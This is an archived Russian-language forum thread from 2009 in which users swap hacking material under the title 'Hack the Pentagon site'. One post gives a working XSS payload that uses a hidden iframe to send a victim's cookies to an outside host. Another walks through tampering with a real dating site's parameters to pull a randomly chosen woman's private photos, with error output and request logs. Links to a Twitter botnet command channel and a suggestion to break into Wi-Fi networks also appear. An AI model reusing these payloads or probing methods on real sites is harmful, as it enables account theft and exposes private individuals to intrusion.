Форум Херсона. Форум Херсонской молодежи.

Форум Херсона. Форум Херсонской молодежи. (http://forum.norma4.net.ua/)
-   Программирование (http://forum.norma4.net.ua/programmirovanie/)
-   -   Взломать сайт пентагона (http://forum.norma4.net.ua/programmirovanie/15876-vzlomatue-sait-pentagona.html)

TIGR 08.08.2009 16:58

Взломать сайт пентагона
 

предлагаю пообсуждать вопросы связанные с безопасностью. Если встретите кидайте интересные XSS-уязвимости, поломаные сайты и программы(необязательно взломаные) - у меня где то хранится скрин как упал сайт микрософта и т.п.

покажу простой скрипт для примера важности фильтровать вводимые данные, пример из жизни, казалось бы профессиональная группа програмистов - но поля ввода не проверяет...

Цитата:

<iframe width=0 height=0 id="asd" src="example.com"></iframe>
<script>
var iframe = document.getElementById('asd');
iframe.src='example.com?cookie=' + document.cookie;
</script>
и когда информация из этого поля просматривал какой-либо пользователь то его аккаунт переходил в чужие руки.

второй пример можно сказать аналогичен предыдущему только жертва сама отдаёт нужную инфу
Цитата:

http://ekimoff.ru/35/
человек вроде бы пытается помочь всем, но никто не обращает внимания на внутренности скрипта!!

ну и напоследок тоже популярный способ получения кук.
Цитата:

http://habrahabr.ru/blogs/infosecurity/63819/
ну и да, конечно! ломаем форум нормы :) надо ж когда-нибудь выполнить мечту забаненого.:moil:

pingwinator 08.08.2009 17:04

http://www.crime.org.ua/osobliva/16/
Цитата:

Стаття 361. Несанкціоноване втручання в роботу електронно-обчислювальних машин (комп'ютерів), автоматизованих систем, комп'ютерних мереж чи мереж електрозв'язку

1. Несанкціоноване втручання в роботу електронно-обчислювальних машин (комп'ютерів), автоматизованих систем, комп'ютерних мереж чи мереж електрозв'язку, що призвело до витоку, втрати, підробки, блокування інформації, спотворення процесу обробки інформації або до порушення встановленого порядку її маршрутизації, -
карається штрафом від шестисот до тисячі неоподатковуваних мінімумів доходів громадян або обмеженням волі на строк від двох до п'яти років, або позбавленням волі на строк до трьох років, з позбавленням права обіймати певні посади чи займатися певною діяльністю на строк до двох років або без такого та з конфіскацією програмних та технічних засобів, за допомогою яких було вчинено несанкціоноване втручання, які є власністю винної особи.
2. Ті самі дії, вчинені повторно або за попередньою змовою групою осіб, або якщо вони заподіяли значну шкоду, -
караються позбавленням волі на строк від трьох до шести років з позбавленням права обіймати певні посади чи займатися певною діяльністю на строк до трьох років та з конфіскацією програмних та технічних засобів, за допомогою яких було вчинено несанкціоноване втручання, які є власністю винної особи.
на досуге дочитай дальше про 361-363 статью

TIGR 08.08.2009 17:07

Цитата:

Сообщение от pingwinator (Сообщение 442210)
http://www.crime.org.ua/osobliva/16/

на досуге дочитай дальше про 361-363 статью

а кто несанкционированно вламывается? покажи мне пожалуйста - где я писал о взломе? всё в рамках закона. тем более я ж написал что тема о безопасности - её ж строить надо зная угрозы, а не думать что взломщики посмотрят на закон украины и ужаснутся.

zwitter 08.08.2009 17:12

Вложений: 1
склей себе игрушку )))

pingwinator 08.08.2009 17:14

Цитата:

Сообщение от TIGR (Сообщение 442212)
а кто несанкционированно вламывается? покажи мне пожалуйста - где я писал о взломе? всё в рамках закона. тем более я ж написал что тема о безопасности - её ж строить надо зная угрозы, а не думать что взломщики посмотрят на закон украины и ужаснутся.

это ты не мне расказывай, а людям в пононах

TIGR 08.08.2009 17:15

Цитата:

Сообщение от pingwinator (Сообщение 442216)
это ты не мне расказывай, а людям в пононах

ну да - они придут и посадят меня за то что разглашаю секреты кражи куков. )) может весь античат - это люди в погонах?:smit:

pingwinator 08.08.2009 17:16

Цитата:

Сообщение от TIGR (Сообщение 442218)
ну да - они придут и посадят меня за то что разглашаю секреты кражи куков. )) может весь античат - это люди в погонах?:smit:

всё - хана тебе
спалил ты их

TIGR 08.08.2009 17:23

кстати кто еще сидит в XP < SP2 и 2000 прикольная уязвимость есть.
http://www.xakep.ru/post/19581/default.asp

когда то сам пострадал изза этог бага - закидали меня виндовс сообщениями о том что мой комп поимели. описание по его применению было развешано на каждом углу интернета, поэтому каждый более или менее умеющий читать юзер пробовал это делать.

pingwinator 08.08.2009 17:27

Цитата:

Сообщение от TIGR (Сообщение 442223)
кстати кто еще сидит в XP < SP2 и 2000 прикольная уязвимость есть.
http://www.xakep.ru/post/19581/default.asp

когда то сам пострадал изза этог бага - закидали меня виндовс сообщениями о том что мой комп поимели. описание по его применению было развешано на каждом углу интернета, поэтому каждый более или менее умеющий читать юзер пробовал это делать.

это давно закрыли
есть более новые и весёлые игрушки

TIGR 08.08.2009 17:30

Цитата:

Сообщение от pingwinator (Сообщение 442225)
это давно закрыли
есть более новые и весёлые игрушки

дык я ж и говорю что закрыли с приходом сп2. а новые игрушки каждый день выходят ) так что давай расскрывайся пенгвин - человеки в погонах ждут веселых игрушек и зрелищ :)

ustas 08.08.2009 17:50

речь о каких уязвимостях и какой системы?
их то вагон, половина из которых актуальна и врядли известна, кроме круга разработчиков, которые делают эксплоиты и потом успешно их продают
что даст тебе это знание? :) ты как правило узнаешь об этом постфактум - или понимание как тебя поимели есть цель? :)

pingwinator 08.08.2009 17:58

Цитата:

Сообщение от TIGR (Сообщение 442226)
дык я ж и говорю что закрыли с приходом сп2. а новые игрушки каждый день выходят ) так что давай расскрывайся пенгвин - человеки в погонах ждут веселых игрушек и зрелищ :)

на, играйся

http://www.ntinternals.org/index.html#09_07_30

TIGR 08.08.2009 18:20

Цитата:

Сообщение от ustas (Сообщение 442235)
речь о каких уязвимостях и какой системы?
их то вагон, половина из которых актуальна и врядли известна, кроме круга разработчиков, которые делают эксплоиты и потом успешно их продают
что даст тебе это знание? :) ты как правило узнаешь об этом постфактум - или понимание как тебя поимели есть цель? :)

это типа как спросить "о чем форум наш?", "что даст то что узнаешь прочитав его?" :) ровным счетом ни о чем и ничего не даст :) закрываем форум?

конечно думаю и ежу понятно что очередная багтрекалка никаму не нужна, так же как и очередной агрегатор новостей про линукс, винвовс и т.п.

да, мне интересно как меня поимели, а тебе разве не интересно когда у тебя уводят аккаунт с важного ресурса?

ustas 08.08.2009 18:53

Цитата:

Сообщение от TIGR (Сообщение 442241)
это типа как спросить "о чем форум наш?", "что даст то что узнаешь прочитав его?" :) ровным счетом ни о чем и ничего не даст :) закрываем форум?

конечно думаю и ежу понятно что очередная багтрекалка никаму не нужна, так же как и очередной агрегатор новостей про линукс, винвовс и т.п.

да, мне интересно как меня поимели, а тебе разве не интересно когда у тебя уводят аккаунт с важного ресурса?

честно, не интересно
интересней почитать как уводят у других :)

и ты правильно заметил что тут будет сплошной копипаст, т.к. никто не занимается ресерчем уязвимостей, что вполне логично и естественно

pingwinator 08.08.2009 19:15

Цитата:

Сообщение от ustas (Сообщение 442249)
честно, не интересно
интересней почитать как уводят у других :)

и ты правильно заметил что тут будет сплошной копипаст, т.к. никто не занимается ресерчем уязвимостей, что вполне логично и естественно

ну вот чтобы не было копипаста - возмём для експеримента сайт херсонгёрлз

цель - посмотреть личную инфу
для експеримента выбираем жертву http://www.khersongirls.com/php/detail.php?site=4698
для начала хотим получить фотки (на анкете их одна, на самом деле их больше)
такс -смотрим на ссылку на фотку
Код:

http://www.khersongirls.com/php/photo.php?subcatalog=20&photo_file=2534x4698x34719.jpeg&agent_domain=khersongirls.com
смотрим чё за аргументы
subcatalog=20 - папка с фоткой
photo_file=2534x4698x34719.jpeg - страное имя файла. как оказалась первое число - номер анкеты, второе - внутрений номер в базе (он же номер страницы), а вот 35303 - хм. как оказалось номер фотки с фотика. пробуем поменять - опа, пошли фотки. но надо как-то забрать оригинали а не то что отдаёт скрип
последнее agent_domain=khersongirls.com - подпись под фоткой

ладно - вернёмся к изменению фото_файл
ошиблись в значении - опа, ошибка в пхп скрипте
Код:

Warning:  getimagesize: Unable to open '/home/k/h/khersongirls.com/html//php/files/photos/20/2534x4698x3471.jpeg' for reading. in /home/k/h/khersongirls.com/html/php/photo.php on line 15

Warning: imagecreatefromjpeg: Unable to open '/home/k/h/khersongirls.com/html//php/files/photos/20/2534x4698x3471.jpeg' for reading in /home/k/h/khersongirls.com/html/php/photo.php on line 24

Warning:  Supplied argument is not a valid Image resource in /home/k/h/khersongirls.com/html/php/photo.php on line 31

Warning: Cannot add header information - headers already sent by (output started at /home/k/h/khersongirls.com/html/php/photo.php:15) in /home/k/h/khersongirls.com/html/php/photo.php on line 34

Warning:  Supplied argument is not a valid Image resource in /home/k/h/khersongirls.com/html/php/photo.php on line 38

подозрения свершились
значит
Код:

http://www.khersongirls.com/php/photo.php?subcatalog=20&photo_file=2534x4698x34719.jpeg&agent_domain=khersongirls.com
берёт файл с
Код:

khersongirls.com/php/files/photos/20/2534x4698x34719.jpeg
- а вот нет, как оказалась файлы там защищены и редирект
Код:

GET /php/files/photos/20/2534x4698x34719.jpeg HTTP/1.0
User-Agent: Wget/1.11.4
Accept: */*
Host: khersongirls.com
Connection: Keep-Alive

---request end---
Запрос HTTP послан, ожидание ответа...
---response begin---
HTTP/1.1 302 Found
Date: Sat, 08 Aug 2009 17:16:20 GMT
Server: Apache/1.3.27 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.12 OpenSSL/0.9.6b PHP/4.1.2 FrontPage/5.0.2.2510
Location: http://www.khersongirls.com/index.htm
Connection: close
Content-Type: text/html; charset=iso-8859-1

---response end---
302 Found
Адрес: http://www.khersongirls.com/index.htm [переход]

вот покамись на этом остановился. у кого есть идеи как получить оригинал?

ПОВТОРЯЮ - ПРОФИЛЬ ЖЕРТВЫ ВЫБРАН В СЛУЧАЙНОМ ПОРЯДКЕ. ничего лично, это придено для примера

pingwinator добавил 08.08.2009 в 20:17
кстати, класический приём с
Цитата:

http://www.khersongirls.com/php/help...p://google.com
несработал :(
было бы весело если бы даные не инклудились с папки help/

TIGR 16.08.2009 21:34

Заводим себе твиттер бота :)
Цитата:

KreiosC2 is a proof of concept bot which uses Twitter as its Command and Control channel. Obviously this can be used for malicious purposes but also for good ones, you can set up a bot at home to listen to your Twitter feed and perform actions on it. I'll discuss the potentially malicious use of it here but it would be easy to take the concepts and use them for good.
http://www.digininja.org/projects/kreiosc2.php

PapaZol 20.08.2009 14:48

В Херсоне осудили хакера.

Комсомольский райсуд Херсона вынес приговор 24-летнему хакеру.
Студент одного из ВУЗов Херсона незаконно вмешался в работу одного из провайдеров Херсона. Молодому человеку удалось получить логины и пароли, с помощью которых входил в интернет, блокируя тем самым доступ к сети другим пользователям. Убытки понесли более 200 абонентов.
Комсомольский райсуд Херсона, приговор которого уже вступил в законную силу, признал хакера виновным в преступлении, предусмотренном ч. 1 ст. 361 (незаконное вмешательство в работу компьютеров, систем и компьютерных сетей) Уголовного кодекса Украины.
Суд назначил преступнику наказание в виде 2 лет ограничения свободы с испытательным сроком 1 год. Хакер должен также уплатить штраф и компенсировать убытки потерпевшим.

У кого какие коментарии?

pingwinator 20.08.2009 14:52

Цитата:

Сообщение от PapaZol (Сообщение 445378)
В Херсоне осудили хакера.

Комсомольский райсуд Херсона вынес приговор 24-летнему хакеру.
Студент одного из ВУЗов Херсона незаконно вмешался в работу одного из провайдеров Херсона. Молодому человеку удалось получить логины и пароли, с помощью которых входил в интернет, блокируя тем самым доступ к сети другим пользователям. Убытки понесли более 200 абонентов.
Комсомольский райсуд Херсона, приговор которого уже вступил в законную силу, признал хакера виновным в преступлении, предусмотренном ч. 1 ст. 361 (незаконное вмешательство в работу компьютеров, систем и компьютерных сетей) Уголовного кодекса Украины.
Суд назначил преступнику наказание в виде 2 лет ограничения свободы с испытательным сроком 1 год. Хакер должен также уплатить штраф и компенсировать убытки потерпевшим.

У кого какие коментарии?

попалился чувак

TIGR 20.08.2009 16:54

Цитата:

Сообщение от PapaZol (Сообщение 445378)
В Херсоне осудили хакера.

У кого какие коментарии?

интересное определение "харека".

Gravy 20.08.2009 18:27

Цитата:

Сообщение от PapaZol (Сообщение 445378)
У кого какие коментарии?

1. чувак со скайнета
2. накрыли его, как ни странно, сотрудники сбу

Absent 20.08.2009 18:58

Ну а де ссылка на скринкаст с ютьюба как ложить сайт пинтагона 8))))

Этаж интересна дажэ моим бывшим соседям 8))))

А про секьюру...
Логи домашних сетей, и не тока, по закону, хранятся в сейфах дирекции, в зипах, на винтах, сроком от трёх лет.
Если нет - значит нарушАемс, нарушАемс...

Эк пинтагон то простимулировал китайское винтостроение 8)))

Робот Вертер 20.08.2009 21:20

Цитата:

Сообщение от TIGR (Сообщение 444473)
Заводим себе твиттер бота :)

http://www.digininja.org/projects/kreiosc2.php

может ты имел ввиду Цвиттер-бота? =))

шока 27.11.2009 20:51

Цитата:

Сообщение от TIGR (Сообщение 442212)
а кто несанкционированно вламывается? покажи мне пожалуйста - где я писал о взломе? всё в рамках закона. тем более я ж написал что тема о безопасности - её ж строить надо зная угрозы, а не думать что взломщики посмотрят на закон украины и ужаснутся.

а тема Взломать сайт пентагона тоже в рамки закона влазит?
Совет: а эффективней пообсуждать нужно на специализированных сайтах типа хакер.ру. Вообщем гугл в помощь.

TIGR 27.11.2009 21:20

Цитата:

Сообщение от шока (Сообщение 476885)
а тема Взломать сайт пентагона тоже в рамки закона влазит?
Совет: а эффективней пообсуждать нужно на специализированных сайтах типа хакер.ру. Вообщем гугл в помощь.

хакер.ру далеко не специализированный сайт )))

зы тема влазит во все рамки.

Slayer_UA 27.11.2009 22:58

Цитата:

Сообщение от Gravy (Сообщение 445420)
1. чувак со скайнета
2. накрыли его, как ни странно, сотрудники сбу

а что сдесь странного, они этим делом как раз и занимаются, работа такая. :smit:

Rezonat 27.11.2009 23:03

Цитата:

Сообщение от Slayer_UA (Сообщение 476937)
а что сдесь странного, они этим делом как раз и занимаются, работа такая. :smit:

они не должны заниматься такими делами, разве что если им совсем уже нечего больше делать

TIGR 27.11.2009 23:10

Цитата:

Сообщение от Rezonat (Сообщение 476938)
они не должны заниматься такими делами, разве что если им совсем уже нечего больше делать

а им обычно и нечего делать :) внешней угрозы у украины то нет.

ustas 28.11.2009 10:35

внутренние угрозы это тоже часть парафиии сбу
а вообще конечно смешно смотреть программы про сбу и милицию где они по большей части показывают и рассказывают о том как проституток поганяли, наркопритон накрыли, порнухи изъяли, зело важные дела всё да, всё остальное ммелочи недостойные внимания :), а как какое нибудь громкое дело. так оно вмиг тихим становится и неприметным :)

шока 18.12.2009 19:38

дафайте луче сети вай фай поламаем, хоть какая-то польза халявная будет))

Debian 18.12.2009 20:06

сломать пол дела
даже меньше...
большая половина дела - чтобы не спалили)
или даже если и спалили то не нашли =)


Время на сервере: 00:26.

vBulletin 3, Copyright © 2000-2024, Jelsoft Enterprises Ltd.
Русский перевод: zCarot, Vovan & Co